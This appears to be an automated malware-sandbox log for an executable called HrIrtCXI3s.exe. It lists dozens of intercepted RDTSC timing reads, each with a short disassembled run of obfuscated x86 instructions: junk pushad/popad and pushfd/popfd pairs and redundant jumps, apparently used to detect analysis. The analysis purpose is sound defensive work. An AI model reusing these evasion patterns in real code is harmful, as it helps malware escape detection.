Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209D7 second address: 72209DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209DD second address: 7220A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 pushfd 0x00000007 jmp 00007FFBBCAD728Eh 0x0000000c and si, 3E88h 0x00000011 jmp 00007FFBBCAD728Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+3Ch], eax 0x0000001d jmp 00007FFBBCAD7296h 0x00000022 mov eax, dword ptr [ebx+20h] 0x00000025 pushad 0x00000026 movzx ecx, bx 0x00000029 popad 0x0000002a mov dword ptr [esi+40h], eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FFBBCAD728Bh 0x00000034 jmp 00007FFBBCAD7293h 0x00000039 popfd 0x0000003a jmp 00007FFBBCAD7298h 0x0000003f popad 0x00000040 lea eax, dword ptr [ebx+00000080h] 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007FFBBCAD728Eh 0x0000004d and ecx, 2CC698D8h 0x00000053 jmp 00007FFBBCAD728Bh 0x00000058 popfd 0x00000059 mov dx, cx 0x0000005c popad 0x0000005d push 00000001h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220A98 second address: 7220A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220A9C second address: 7220AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220AA2 second address: 7220ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFBBCD9554Dh 0x00000013 jmp 00007FFBBCD9554Bh 0x00000018 popfd 0x00000019 mov edi, esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220ADD second address: 7220B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCAD728Bh 0x00000008 pushfd 0x00000009 jmp 00007FFBBCAD7298h 0x0000000e or esi, 35285F28h 0x00000014 jmp 00007FFBBCAD728Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f mov ebx, 47CBADCAh 0x00000024 pushad 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BA0 second address: 7220BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BA6 second address: 7220BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 6320h 0x00000012 jmp 00007FFBBCAD7299h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220BDB second address: 7220C1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, CEh 0x00000005 call 00007FFBBCD95558h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edi, edi 0x00000010 jmp 00007FFBBCD95551h 0x00000015 js 00007FFC2A973FFAh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C1B second address: 7220C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C1F second address: 7220C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C25 second address: 7220C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD7290h 0x00000008 pop eax 0x00000009 mov dx, 2796h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp-0Ch] 0x00000013 pushad 0x00000014 mov dx, 936Eh 0x00000018 pushfd 0x00000019 jmp 00007FFBBCAD728Fh 0x0000001e add cx, B41Eh 0x00000023 jmp 00007FFBBCAD7299h 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FFBBCAD728Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C8A second address: 7220D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 push 00000001h 0x00000013 jmp 00007FFBBCD95550h 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e pushfd 0x0000001f jmp 00007FFBBCD95559h 0x00000024 sbb si, 27C6h 0x00000029 jmp 00007FFBBCD95551h 0x0000002e popfd 0x0000002f popad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FFBBCD9554Eh 0x00000037 add cx, B068h 0x0000003c jmp 00007FFBBCD9554Bh 0x00000041 popfd 0x00000042 mov edi, ecx 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007FFBBCD95555h 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFBBCD9554Dh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220D45 second address: 7220D63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov di, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220DCC second address: 7220E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FFBBCD9554Eh 0x0000000b adc eax, 6186EEA8h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edi, eax 0x0000001c pushad 0x0000001d mov dx, cx 0x00000020 pushfd 0x00000021 jmp 00007FFBBCD95550h 0x00000026 jmp 00007FFBBCD95555h 0x0000002b popfd 0x0000002c popad 0x0000002d test edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, A14Eh 0x00000036 pushfd 0x00000037 jmp 00007FFBBCD9554Fh 0x0000003c or si, F9FEh 0x00000041 jmp 00007FFBBCD95559h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220E5C second address: 7220E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 4099h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FFC2A6B5AD9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FFBBCAD7291h 0x00000019 or ah, FFFFFFE6h 0x0000001c jmp 00007FFBBCAD7291h 0x00000021 popfd 0x00000022 mov ch, 9Dh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220E99 second address: 7220EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD95557h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220EC3 second address: 7220F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FFBBCAD728Eh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 pushad 0x00000015 jmp 00007FFBBCAD728Eh 0x0000001a pushfd 0x0000001b jmp 00007FFBBCAD7292h 0x00000020 xor si, C1A8h 0x00000025 jmp 00007FFBBCAD728Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FFBBCAD7295h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220F41 second address: 7220FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFBBCD9554Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFBBCD95557h 0x00000018 or cl, FFFFFFAEh 0x0000001b jmp 00007FFBBCD95559h 0x00000020 popfd 0x00000021 mov ax, A637h 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007FFBBCD9554Ch 0x0000002c xor ecx, 3243AB28h 0x00000032 jmp 00007FFBBCD9554Bh 0x00000037 popfd 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007FFBBCD95556h 0x0000003f lea eax, dword ptr [ebp-18h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 mov eax, edx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220FE4 second address: 7221022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFBBCAD7290h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FFBBCAD7291h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221022 second address: 7221035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, bh 0x0000000f mov di, si 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221035 second address: 722103B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221094 second address: 7221098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221098 second address: 722109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722109E second address: 72210BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72210BB second address: 7221163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b mov bx, 255Eh 0x0000000f push edx 0x00000010 jmp 00007FFBBCAD7292h 0x00000015 pop eax 0x00000016 popad 0x00000017 js 00007FFC2A6B5856h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFBBCAD7297h 0x00000024 jmp 00007FFBBCAD7293h 0x00000029 popfd 0x0000002a movzx esi, bx 0x0000002d popad 0x0000002e mov eax, dword ptr [ebp-14h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FFBBCAD728Ch 0x0000003a jmp 00007FFBBCAD7295h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FFBBCAD7290h 0x00000046 and esi, 608BA548h 0x0000004c jmp 00007FFBBCAD728Bh 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221163 second address: 7221188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221188 second address: 722118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722118C second address: 7221192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221192 second address: 72211A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCAD7291h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211A7 second address: 72211B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211B8 second address: 72211CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211CE second address: 722126A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov al, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, 74E806ECh 0x0000000f pushad 0x00000010 jmp 00007FFBBCD95551h 0x00000015 popad 0x00000016 sub eax, eax 0x00000018 pushad 0x00000019 mov edi, 29EEAEE0h 0x0000001e mov edx, 613FD90Ch 0x00000023 popad 0x00000024 lock cmpxchg dword ptr [edx], ecx 0x00000028 pushad 0x00000029 call 00007FFBBCD95551h 0x0000002e pushfd 0x0000002f jmp 00007FFBBCD95550h 0x00000034 sbb esi, 4E975458h 0x0000003a jmp 00007FFBBCD9554Bh 0x0000003f popfd 0x00000040 pop esi 0x00000041 popad 0x00000042 pop edi 0x00000043 jmp 00007FFBBCD95552h 0x00000048 test eax, eax 0x0000004a jmp 00007FFBBCD95550h 0x0000004f jne 00007FFC2A9739C4h 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722126A second address: 722126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722126E second address: 7221272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221272 second address: 7221278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221278 second address: 722129F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 68888860h 0x00000014 mov ax, bx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722129F second address: 72212A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72212A5 second address: 72212A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72212A9 second address: 72212C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ebx, esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722145A second address: 722147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD95551h 0x00000009 jmp 00007FFBBCD9554Bh 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72215E6 second address: 722160E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ebx, 4AAFFA46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+30h], ax 0x00000011 jmp 00007FFBBCAD728Dh 0x00000016 mov ax, word ptr [esi+32h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722160E second address: 7221614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221614 second address: 722161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722161A second address: 722161E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722161E second address: 722165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007FFBBCAD7298h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFBBCAD7297h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722165E second address: 722168D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD9554Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722168D second address: 7221693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221693 second address: 7221697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221697 second address: 72216AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, C477h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72216AF second address: 7221707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCD95559h 0x00000008 pop esi 0x00000009 mov edx, 62C5D944h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007FFC2A973589h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FFBBCD95554h 0x00000020 adc ax, C5F8h 0x00000025 jmp 00007FFBBCD9554Bh 0x0000002a popfd 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221707 second address: 7221761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d jmp 00007FFBBCAD7290h 0x00000012 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a pushfd 0x0000001b jmp 00007FFBBCAD728Ah 0x00000020 sbb esi, 36902AB8h 0x00000026 jmp 00007FFBBCAD728Bh 0x0000002b popfd 0x0000002c popad 0x0000002d or dword ptr [edx+40h], FFFFFFFFh 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221761 second address: 7221765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221765 second address: 722176B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722176B second address: 7221793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCD95557h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221793 second address: 72217B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270CDE second address: 7270D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1994E581h 0x00000008 pushfd 0x00000009 jmp 00007FFBBCD9554Eh 0x0000000e and al, FFFFFF98h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFBBCD95550h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D1C second address: 7270D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D2B second address: 7270D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D33 second address: 7270D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFBBCAD7299h 0x00000012 add cx, 6246h 0x00000017 jmp 00007FFBBCAD7291h 0x0000001c popfd 0x0000001d jmp 00007FFBBCAD7290h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D81 second address: 7270D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210821 second address: 721083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov bl, 60h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCAD728Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 721083A second address: 721089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBBCD95551h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FFBBCD9554Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e jmp 00007FFBBCD95555h 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 721089E second address: 72108A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0050 second address: 71B008C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 78h 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, cx 0x00000013 pushfd 0x00000014 jmp 00007FFBBCD95556h 0x00000019 sbb ax, 2448h 0x0000001e jmp 00007FFBBCD9554Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
